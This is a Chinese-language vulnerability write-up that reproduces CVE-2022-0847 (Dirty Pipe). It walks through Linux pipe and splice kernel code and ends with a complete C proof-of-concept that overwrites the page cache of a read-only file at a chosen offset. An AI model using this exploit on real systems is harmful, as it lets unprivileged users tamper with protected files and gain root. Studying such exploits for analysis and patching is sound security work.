CVE-2022-0847漏洞复现 page cache 首先取自linux官方文档对于page cache的解释
物理内存是易失性的,将数据导入内存的常见情况是从文件中读取数据。每当读取文件时,数据都会放入page cache中,以避免在后续读取时进行昂贵的磁盘访问。同样,当写入文件时,数据被放置在page cache中,并最终进入后备存储设备。写入的页面被标记为脏页面,当 Linux 决定将它们重用于其他目的时,它会确保将设备上的文件内容与更新的数据同步。
pipe系列 在我们申请到一个pipe管道后,他们在内存当中大致呈以下局面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 struct file +----------------+ | | +--------->| | | +----------------+ | | *private_data +-----------------------------------+ | | | | | +----------------+ | | +----+ *f_op | | | | | | | | | +----------------+ | Userland | | | *f_inode +--+ | struct pipe_inode_info | | | | | | +-----------------+-----------------+ | | +----------------+ | struct inode | +------------+ | fd[0] | files[0] +-----+ | | | +-->+------------+ +------->| | +-------------+ | | read | | +----------------+ | | *i_op +----+ | +------------+ +--->| pipe_buffer | +-----------------+-----------------+ | | | | | | | | | +-------------+ | fd[1] | files[1] +-----+ | | +------------+ | | +------------+ | | pipe_buffer | | | write | | | struct file | | ...... | | | | | | +-------------+ +-----------------+-----------------+ | | +----------------+ | | | | | +------------+ | | ........... | +-----|--->| | | +------------+ | | | *bufs +------+ +-------------+ | | | | | i_pipe +----|----------+ +------------+ | pipe_buffer | | +----------------+ | | | | | | +-------------+ | | *private_data | | +------------+ | +------------+ | | | | | ...... | | +------------+ | +----------------+ | | | | +----+ *f_op | | +------------+ | | | | | | | +----------------+ | | +------------------------------------------------+ | | *f_inode | | | | const struct file_operations pipefifo_fops = { | | | +--+ | | .open = fifo_open, | | +----------------+ | | .llseek = no_llseek, | | | | | | .read_iter = pipe_read, | | +----------------+ +-----+------------+ .write_iter = pipe_write, | | | | .poll = pipe_poll, | | | | .unlocked_ioctl = pipe_ioctl, | | | | .release = pipe_release, | | | | .fasync = pipe_fasync, | | | | .splice_write = iter_file_splice_write, | +----------------------------------------+ | }; | +------------------------------------------------+
pipe_inode_info 位于 include/linux/pipe_fs_i.h
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 58 struct pipe_inode_info {59 struct mutex mutex ;60 wait_queue_head_t rd_wait, wr_wait;61 unsigned int head; 62 unsigned int tail; 63 unsigned int max_usage; 64 unsigned int ring_size; 65 #ifdef CONFIG_WATCH_QUEUE 66 bool note_loss;67 #endif 68 unsigned int nr_accounted; 69 unsigned int readers; 70 unsigned int writers; 71 unsigned int files; 72 unsigned int r_counter;73 unsigned int w_counter; 74 unsigned int poll_usage;75 struct page *tmp_page ;76 struct fasync_struct *fasync_readers ;77 struct fasync_struct *fasync_writers ;78 struct pipe_buffer *bufs ; 79 struct user_struct *user ; 80 #ifdef CONFIG_WATCH_QUEUE 81 struct watch_queue *watch_queue ;82 #endif 83 };
pipefifo_fops 位于 fs/pipe.c
,这里是pipe管道文件对应的虚函数表
1 2 3 4 5 6 7 8 9 10 11 1218 const struct file_operations pipefifo_fops = {1219 .open = fifo_open,1220 .llseek = no_llseek,1221 .read_iter = pipe_read, 1222 .write_iter = pipe_write,1223 .poll = pipe_poll,1224 .unlocked_ioctl = pipe_ioctl,1225 .release = pipe_release,1226 .fasync = pipe_fasync,1227 .splice_write = iter_file_splice_write,1228 };
pipe_write 一步一步分析pipe_write
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 415 static ssize_t 416 pipe_write(struct kiocb *iocb, struct iov_iter *from) 417 { 418 struct file *filp = iocb->ki_filp;419 struct pipe_inode_info *pipe = filp->private_data;420 unsigned int head;421 ssize_t ret = 0 ;422 size_t total_len = iov_iter_count(from);423 ssize_t chars;424 bool was_empty = false ;425 bool wake_next_writer = false ; ......446 454 head = pipe->head;455 was_empty = pipe_empty(head, pipe->tail); 456 chars = total_len & (PAGE_SIZE-1 ); 457 if (chars && !was_empty) { 458 unsigned int mask = pipe->ring_size - 1 ; 459 struct pipe_buffer *buf = &pipe->bufs[(head - 1 ) & mask];460 int offset = buf->offset + buf->len; 461 462 if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&463 offset + chars <= PAGE_SIZE) {464 ret = pipe_buf_confirm(pipe, buf);465 if (ret)466 goto out;467 468 ret = copy_page_from_iter(buf->page, offset, chars, from);469 if (unlikely(ret < chars)) {470 ret = -EFAULT;471 goto out;472 }473 474 buf->len += ret; 475 if (!iov_iter_count(from))476 goto out;477 }478 }
简述一下上面的步骤:
检查整个pipe所指向buffer的情况(当前是否为空,即 was_empty),并取得我们想要传入的总字节数 total_len
,然后计算 chars
,这里是总字节相对于pagesize取余数
这里来判断offset + chars会不会超过最近一次写入的buffer(即 bufs[(head - 1) & mask])所指向的页面界限,并且判断buf->flags是否带有 PIPE_BUF_FLAG_CAN_MERGE
参数,满足两个条件就进行下面buffer的复制
然后如果没有进行一个初始的边角料拷贝,或者说拷完了,下面的代码继续运行,是一个大的for循环
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 480 for (;;) {481 if (!pipe->readers) {482 send_sig(SIGPIPE, current, 0 );483 if (!ret)484 ret = -EPIPE;485 break ;486 }487 488 head = pipe->head; 489 if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 490 unsigned int mask = pipe->ring_size - 1 ;491 struct pipe_buffer *buf = &pipe->bufs[head & mask]; 492 struct page *page = pipe->tmp_page;493 int copied;494 495 if (!page) {496 page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 497 if (unlikely(!page)) {498 ret = ret ? : -ENOMEM;499 break ;500 }501 pipe->tmp_page = page;502 }503 504 509 spin_lock_irq(&pipe->rd_wait.lock);510 511 head = pipe->head;512 if (pipe_full(head, pipe->tail, pipe->max_usage)) {513 spin_unlock_irq(&pipe->rd_wait.lock);514 continue ;515 }516 517 pipe->head = head + 1 ;518 spin_unlock_irq(&pipe->rd_wait.lock);519 520 521 buf = &pipe->bufs[head & mask];522 buf->page = page;523 buf->ops = &anon_pipe_buf_ops; 524 buf->offset = 0 ;525 buf->len = 0 ;526 if (is_packetized(filp)) 527 buf->flags = PIPE_BUF_FLAG_PACKET;528 else 529 buf->flags = PIPE_BUF_FLAG_CAN_MERGE; 530 pipe->tmp_page = NULL ;531 532 copied = copy_page_from_iter(page, 0 , PAGE_SIZE, from);533 if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {534 if (!ret)535 ret = -EFAULT;536 break ;537 }538 ret += copied;539 buf->offset = 0 ;540 buf->len = copied;541 542 if (!iov_iter_count(from))543 break ;544 }545 546 if (!pipe_full(head, pipe->tail, pipe->max_usage))547 continue ;548 549 550 if (filp->f_flags & O_NONBLOCK) {551 if (!ret)552 ret = -EAGAIN;553 break ;554 }555 if (signal_pending(current)) {556 if (!ret)557 ret = -ERESTARTSYS;558 break ;559 }560 561 567 __pipe_unlock(pipe);568 if (was_empty)569 wake_up_interruptible_sync_poll(&pipe->rd_wait, 
EPOLLIN | EPOLLRDNORM);570 kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);571 wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));572 __pipe_lock(pipe);573 was_empty = pipe_empty(pipe->head, pipe->tail);574 wake_next_writer = true ;575 } .......
这里的for循环是整个pipe_write部分的核心,他承担了剩下的大部分拷贝,会不断检查pipe->bufs的充盈程度,一旦有空闲则会申请新的page来拷贝我们用户区传入的数据,这里如果我们创建pipe的时候没有设置标识 O_DIRECT
,则会在每个新创建的pipe_buffer->flags
置为 PIPE_BUF_FLAG_CAN_MERGE
pipe_read pipe_read函数大部分就是从上述的环形buffer当中读出数据,然后修改pipe_buffer以及 pipe_inode_info
相对应的部分,值得注意的一点就是其中对于读出完毕的pipe_buffer的flags字段并没有修改,所以当我们pipe_write之后,buf->flags中始终会有该标识位 PIPE_BUF_FLAG_CAN_MERGE
splice系统调用 先看看手册中的描述
splice() moves data between two file descriptors without copying between kernel address space and user address space. It transfers up to len bytes of data from the file descriptor fd_in to the file descriptor fd_out, where one of the file descriptors must refer to a pipe.
大致意思是:该系统调用在两个文件描述符之间移动数据,而不需要在内核地址空间与用户地址空间之间来回拷贝
。它至多可以从 fd_in
文件描述符当中移动大小为 len
的数据至 fd_out
,值得注意的是这两个文件描述符中至少有一个必须引用管道
1 2 3 4 5 6 7 8 9 ssize_t splice (int fd_in, off_t *_Nullable off_in, int fd_out, off_t *_Nullable off_out, size_t len, unsigned int flags) ;
似乎是有九种传参组合
fd_in
off_in
fd_out
off_out
Right/Wrong
pipe
NULL
pipe
NULL
:white_check_mark:
pipe
NULL
file
NULL
:white_check_mark:
pipe
NULL
file
buffer
:white_check_mark:
file
NULL
pipe
NULL
:white_check_mark:
file
NULL
file
NULL
:x:
file
NULL
file
buffer
:x:
file
buffer
pipe
NULL
:white_check_mark:
file
buffer
file
NULL
:x:
file
buffer
file
buffer
:x:
由于有着至少一个pipe的规定,所以最终能正确执行的就只有五种情况
然后我们来看系统调用源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 1332 SYSCALL_DEFINE6(splice, int , fd_in, loff_t __user *, off_in,1333 int , fd_out, loff_t __user *, off_out,1334 size_t , len, unsigned int , flags)1335 {1336 struct fd in , out ;1337 long error;1338 1339 if (unlikely(!len))1340 return 0 ;1341 1342 if (unlikely(flags & ~SPLICE_F_ALL))1343 return -EINVAL;1344 1345 error = -EBADF;1346 in = fdget(fd_in); 1347 if (in.file) {1348 out = fdget(fd_out);1349 if (out.file) {1350 error = __do_splice(in.file, off_in, out.file, off_out,1351 len, flags);1352 fdput(out);1353 }1354 fdput(in);1355 }1356 return error;1357 }
基本没有什么好说的,直接看 __do_splice
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 1116 static long __do_splice(struct file *in, loff_t __user *off_in,1117 struct file *out, loff_t __user *off_out,1118 size_t len, unsigned int flags)1119 {1120 struct pipe_inode_info *ipipe ;1121 struct pipe_inode_info *opipe ;1122 loff_t offset, *__off_in = NULL , *__off_out = NULL ;1123 long ret;1124 1125 ipipe = get_pipe_info(in, true );1126 opipe = get_pipe_info(out, true );1127 1128 if (ipipe && off_in)1129 return -ESPIPE;1130 if (opipe && off_out)1131 return -ESPIPE;1132 1133 if (off_out) {1134 if (copy_from_user(&offset, off_out, sizeof (loff_t ))) 1135 return -EFAULT;1136 __off_out = &offset;1137 }1138 if (off_in) {1139 if (copy_from_user(&offset, off_in, sizeof (loff_t ))) 1140 return -EFAULT; 1141 __off_in = &offset;1142 }1143 1144 ret = do_splice(in, __off_in, out, __off_out, len, flags);1145 if (ret < 0 )1146 return ret;1147 1148 if (__off_out && copy_to_user(off_out, __off_out, sizeof (loff_t )))1149 return -EFAULT;1150 if (__off_in && copy_to_user(off_in, __off_in, sizeof (loff_t )))1151 return -EFAULT;1152 1153 return ret;1154 }
这里仅仅也只是判断了一下你传递的参数的正确性,然后如果某个off_*不为空,则需要将其拷贝到内核空间 :)
do_splice 然后调用 do_splice
函数,该函数比较长,因此我们分开讲解,这里首先分成几种情况,分别是:
in和out均为pipe
in为pipe,out为普通文件
in为普通文件,out为pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 1025 1028 long do_splice (struct file *in, loff_t *off_in, struct file *out, 1029 loff_t *off_out, size_t len, unsigned int flags) 1030 {1031 struct pipe_inode_info *ipipe ;1032 struct pipe_inode_info *opipe ;1033 loff_t offset;1034 long ret;1035 1036 if (unlikely(!(in->f_mode & FMODE_READ) ||1037 !(out->f_mode & FMODE_WRITE)))1038 return -EBADF;1039 1040 ipipe = get_pipe_info(in, true );1041 opipe = get_pipe_info(out, true );1042 1043 if (ipipe && opipe) {1044 if (off_in || off_out) 1045 return -ESPIPE;1046 1047 1048 if (ipipe == opipe)1049 return -EINVAL;1050 1051 if ((in->f_flags | out->f_flags) & O_NONBLOCK)1052 flags |= SPLICE_F_NONBLOCK;1053 1054 return splice_pipe_to_pipe(ipipe, opipe, len, flags);1055 } ......
:one: pipe_to_pipe 可以看到上面的do_splice函数碰到两个pipe,则会调用 splice_pipe_to_pipe
函数,该函数主要是复制了pipe_buffer,将inpipe的pipe_buffer内容复制给了outpipe的pipe_buffer,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 1434 1437 static int splice_pipe_to_pipe (struct pipe_inode_info *ipipe, 1438 struct pipe_inode_info *opipe,1439 size_t len, unsigned int flags) 1440 {1441 struct pipe_buffer *ibuf , *obuf ;1442 unsigned int i_head, o_head;1443 unsigned int i_tail, o_tail;1444 unsigned int i_mask, o_mask;1445 int ret = 0 ;1446 bool input_wakeup = false ; .......1511 ibuf = &ipipe->bufs[i_tail & i_mask];1512 obuf = &opipe->bufs[o_head & o_mask];1513 1514 if (len >= ibuf->len) {1515 1518 *obuf = *ibuf;1519 ibuf->ops = NULL ;1520 i_tail++;1521 ipipe->tail = i_tail;1522 input_wakeup = true ;1523 o_len = obuf->len;1524 o_head++;1525 opipe->head = o_head;1526 } else {1527 1531 if (!pipe_buf_get(ipipe, ibuf)) {1532 if (ret == 0 )1533 ret = -EFAULT;1534 break ;1535 }1536 *obuf = *ibuf; ......
这里我们返回到do_splice,说下一个if判断
注意这里是 do_splice
剩下的部分代码,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 1057 if (ipipe) {1058 if (off_in)1059 return -ESPIPE;1060 if (off_out) {1061 if (!(out->f_mode & FMODE_PWRITE))1062 return -EINVAL;1063 offset = *off_out;1064 } else {1065 offset = out->f_pos;1066 }1067 1068 if (unlikely(out->f_flags & O_APPEND))1069 return -EINVAL;1070 1071 ret = rw_verify_area(WRITE, out, &offset, len); 1072 if (unlikely(ret < 0 ))1073 return ret;1074 1075 if (in->f_flags & O_NONBLOCK)1076 flags |= SPLICE_F_NONBLOCK;1077 1078 file_start_write(out);1079 ret = do_splice_from(ipipe, out, &offset, len, flags);1080 file_end_write(out);1081 1082 if (!off_out)1083 out->f_pos = offset;1084 else 1085 *off_out = offset;1086 1087 return ret; 1088 }
:two: pipe_to_file
然后我们查看do_splice_from
函数,这是第二种情况的判断
1 2 3 4 5 6 7 762 static long do_splice_from (struct pipe_inode_info *pipe, struct file *out, 763 loff_t *ppos, size_t len, unsigned int flags) 764 { 765 if (unlikely(!out->f_op->splice_write))766 return warn_unsupported(out, "write" );767 return out->f_op->splice_write(pipe, out, ppos, len, flags);768 }
这里调用到splice_write函数,他在普通文件当中的初始化函数指针指向iter_file_splice_write
,大意是将ipipe的即将复制pipe_buffer中指向的page页指针赋值给一个bio_vec
数组,他的结构如下:
1 2 3 4 5 32 struct bio_vec { 33 struct page *bv_page ;34 unsigned int bv_len;35 unsigned int bv_offset;36 };
然后之后调用vfs_iter_write
写入文件buffer
:three: file_to_pipe 然后是最后一部分的do_splice
,也是咱们本次漏洞的重点
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 if (opipe) {1091 if (off_out)1092 return -ESPIPE;1093 if (off_in) {1094 if (!(in->f_mode & FMODE_PREAD))1095 return -EINVAL;1096 offset = *off_in;1097 } else {1098 offset = in->f_pos;1099 }1100 1101 if (out->f_flags & O_NONBLOCK)1102 flags |= SPLICE_F_NONBLOCK;1103 1104 ret = splice_file_to_pipe(in, opipe, &offset, len, flags);1105 if (!off_in)1106 in->f_pos = offset;1107 else 1108 *off_in = offset;1109 1110 return ret;1111 }1112 1113 return -EINVAL;1114 }
直接查看splice_file_to_pipe
调用链,这里有个小知识那就是我们要知道某个文件的ops,我们可以直接去查看<name>_file_operations
,其中<name>
为我们的文件系统名称,例如ext4
等等
1 2 3 4 5 splice_file_to_pipe do_splice_to in ->f_op -> splice_read <==> generic_file_splice_read call_read_iter in ->f_op -> read_iter <==> generic_file_read_iter
好我们链条就先到这里,先查看该函数,下面是内核开发者对该函数作出的解释
This is the “read_iter()” routine for all filesystems that can use the page cache directly.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 2772 generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter)2773 {2774 size_t count = iov_iter_count(iter); 2775 ssize_t retval = 0 ;2776 2777 if (!count)2778 return 0 ; 2779 2780 if (iocb->ki_flags & IOCB_DIRECT) { 2781 struct file *file = iocb->ki_filp;2782 struct address_space *mapping = file->f_mapping;2783 struct inode *inode = mapping->host;2784 2785 if (iocb->ki_flags & IOCB_NOWAIT) {2786 if (filemap_range_needs_writeback(mapping, iocb->ki_pos,2787 iocb->ki_pos + count - 1 ))2788 return -EAGAIN;2789 } else {2790 retval = filemap_write_and_wait_range(mapping,2791 iocb->ki_pos,2792 iocb->ki_pos + count - 1 );2793 if (retval < 0 )2794 return retval;2795 }2796 2797 file_accessed(file);2798 2799 retval = mapping->a_ops->direct_IO(iocb, iter);2800 if (retval >= 0 ) {2801 iocb->ki_pos += retval;2802 count -= retval;2803 }2804 if (retval != -EIOCBQUEUED)2805 iov_iter_revert(iter, count - iov_iter_count(iter));2806 2807 2816 if (retval < 0 || !count || IS_DAX(inode))2817 return retval;2818 if (iocb->ki_pos >= i_size_read(inode))2819 return retval;2820 }2821 2822 return filemap_read(iocb, iter, retval);2823 }2824 EXPORT_SYMBOL(generic_file_read_iter);
其中涉及到两个中间变量 iocb
和iter
,他们两个是在generic_file_splice_read
当中进行初始化的,下面分别给出初始化步骤:
iter
iocb
然后我们看到最后调用filemap_read
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 2642 ssize_t filemap_read (struct kiocb *iocb, struct iov_iter *iter, 2643 ssize_t already_read) 2644 {2645 struct file *filp = iocb->ki_filp; 2646 struct file_ra_state *ra = &filp->f_ra;2647 struct address_space *mapping = filp->f_mapping; 2648 struct inode *inode = mapping->host; 2649 struct folio_batch fbatch ;2650 int i, error = 0 ;2651 bool writably_mapped;2652 loff_t isize, end_offset;2653 ...2661 2662 do {2663 cond_resched();2664 2665 2670 if ((iocb->ki_flags & IOCB_WAITQ) && already_read)2671 iocb->ki_flags |= IOCB_NOWAIT;2672 2673 if (unlikely(iocb->ki_pos >= i_size_read(inode)))2674 break ;2675 2676 error = filemap_get_pages(iocb, iter, &fbatch); ...2727 copied = copy_folio_to_iter(folio, offset, bytes, iter);2728 2729 already_read += copied;2730 iocb->ki_pos += copied;2731 ra->prev_pos = iocb->ki_pos;2732 ...2743 2744 file_accessed(filp);2745 2746 return already_read ? already_read : error;2747 }2748 EXPORT_SYMBOL_GPL(filemap_read);
在该函数当中,我们会将数据从page cache复制到管道,这里并没有真正的进行逐字节复制.在一个dowhile的大循环当中,主要通过调用copy_folio_to_iter
来复制chunks
这里给出folio发布的官方解释 ,这样看来folio似乎是一个用来给复合页机制带来的歧义提供的解决办法,但我看到后面似乎并不受欢迎,但是由于现在替代方案较少,所以暂时将就着用吧:)
可以得出一个结论,我们在这里可以大致将folio类比为page,这对我们接下来的理解并没有任何影响,而copy_folio_to_iter
实际上也仅仅是调用了copy_page_to_iter
我们来查看copy_page_to_iter
函数调用链,根据文件的类型会有以下的情况
1 2 3 copy_page_to_iter __copy_page_to_iter copy_page_to_iter_ pipe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 382 static size_t copy_page_to_iter_pipe (struct page *page, size_t offset, size_t bytes, 383 struct iov_iter *i) 384 {385 struct pipe_inode_info *pipe = i->pipe;386 struct pipe_buffer *buf ;387 unsigned int p_tail = pipe->tail;388 unsigned int p_mask = pipe->ring_size - 1 ;389 unsigned int i_head = i->head;390 size_t off;391 392 if (unlikely(bytes > i->count))393 bytes = i->count;394 395 if (unlikely(!bytes))396 return 0 ;397 398 if (!sanity(i))399 return 0 ;400 401 off = i->iov_offset;402 buf = &pipe->bufs[i_head & p_mask]; 403 if (off) {404 if (offset == off && buf->page == page) {405 406 buf->len += bytes;407 i->iov_offset += bytes;408 goto out;409 }410 i_head++;411 buf = &pipe->bufs[i_head & p_mask];412 }413 if (pipe_full(i_head, p_tail, pipe->max_usage))414 return 0 ;415 416 buf->ops = &page_cache_pipe_buf_ops;417 418 get_page(page);419 buf->page = page;420 buf->offset = offset;421 buf->len = bytes;422 423 pipe->head = i_head + 1 ;424 i->iov_offset = offset + bytes;425 i->head = i_head;426 out:427 i->count -= bytes;428 return bytes; 429 }
我们可以看到这里并没有发生实际上的数据拷贝,而仅仅是page页面指针的改写,当文章写到这里我发现5.17.9的linux内核此时已经将该漏洞进行修复,所以这里我手动将其恢复到漏洞版本
漏洞利用 我们现在知道了漏洞点,那就是在我们使用splice系统调用来进行零拷贝时,从file拷贝到pipe其中的一个buffer中时(copy_page_to_iter_pipe)并没有重新设置其中的标识位,也就是pipe_buffer->flags
字段, 此时如果flags中残留有PIPE_BUF_FLAG_CAN_MERGE
,那么我们下次在写入该buffer的时候将从该pipe_buffer
的offset+len开始写,但是此时注意,经过splice的零拷贝,我们的pipe_buffer
是指向的pagecache的,所以这里导致我们可以直接修改pagecache当中的页面,且根本不会去考虑是否为可写,
所以本次漏洞利用分为以下几个步骤:
分配pipe以及其中的buffer
首先向其中灌入大量无意义数据,再依次排空,由于读并不会修改我们的标识,所以这样使得我们每个pipe_buffer都会带有PIPE_BUF_FLAG_CAN_MERGE
标识
splice
系统调用,将不可写的文件数据内容”拷贝”到pipe当中
我们将对于pipe的写转化为了对于不可写文件所映射到的pagecache的写
下面是漏洞的poc以及演示
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <string.h> #include <stdint.h> #define PAGE_SIZE 0x1000 void initial_pipe (int *my_pipe) ;void fill_pipe (int *my_pipe) ;void drain_pipe (int *my_pipe) ;void free_env (int *my_pipe) ;void debug () { printf ("[\033[5;33m!\033[0m]\033[32mDebugging Here\033[0m\n" ); getchar(); }int main (int argc, char ** argv) { int my_pipe[2 ] = {0 }; int fd_read = 0 ; char buf[0x10 ] = {'\x00' }; struct stat file_st ; uint64_t offset = 0 ; if (argc < 4 ){ printf ("[x]The poc's right use is: \n<our_poc> <vuln_file> <offset> <payload>\n" ); puts ("[?]len < 0 will read the hole file..." ); exit (1 ); } puts ("[+]Initial the pipe..." ); initial_pipe(my_pipe); puts ("[+]Fill the pipe..." ); fill_pipe(my_pipe); puts ("[+]drain the pipe..." ); drain_pipe(my_pipe); fd_read = open(argv[1 ], O_RDONLY); if (fd_read < 0 ){ perror("open vuln file failed!" ); exit (1 ); } if (fstat(fd_read, &file_st) < 0 ){ perror("stat file failed!" ); exit (1 ); } if (argv[2 ] > 0 ) offset = atoi(argv[2 ]); else offset = file_st.st_size; printf ("%d\n" , offset); if (splice(fd_read, (uint64_t *)&offset, my_pipe[1 ], NULL , 1 , 0 ) < 0 ){ perror("splice fd to pipe" ); exit (1 ); } puts ("[+]We successfully execute the splice..." 
); if (write(my_pipe[1 ], argv[3 ], sizeof (argv[3 ])) < 0 ){ perror("write failed" ); exit (1 ); } free_env(my_pipe); close(fd_read); return 0 ; }void initial_pipe (int *my_pipe) { pipe(my_pipe); fcntl(my_pipe[1 ], F_SETPIPE_SZ, 1 *PAGE_SIZE); }void fill_pipe (int *my_pipe) { int pipe_size = fcntl(my_pipe[1 ], F_GETPIPE_SZ); int nr = 0 ; printf ("[*]pipe_size is %d\n" , pipe_size); char buffer[PAGE_SIZE] = {0 }; memset (buffer, 0x41 , sizeof (buffer)); for (;pipe_size > 0 ; pipe_size -= nr) nr = write(my_pipe[1 ], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size)); printf ("[*]Fill the pipe done...\n" ); }void drain_pipe (int *my_pipe) { int pipe_size = fcntl(my_pipe[1 ], F_GETPIPE_SZ); int nr = 0 ; printf ("[*]pipe_size is %d\n" , pipe_size); char buffer[PAGE_SIZE] = {0 }; for (;pipe_size > 0 ; pipe_size -= nr) nr = read(my_pipe[0 ], buffer, (pipe_size > PAGE_SIZE ? PAGE_SIZE : pipe_size)); printf ("[*]Drain the pipe done...\n" ); }void free_env (int *pipe) { close(pipe[0 ]); close(pipe[1 ]); }
参考 洞主原文章
精彩复现
folio是甚么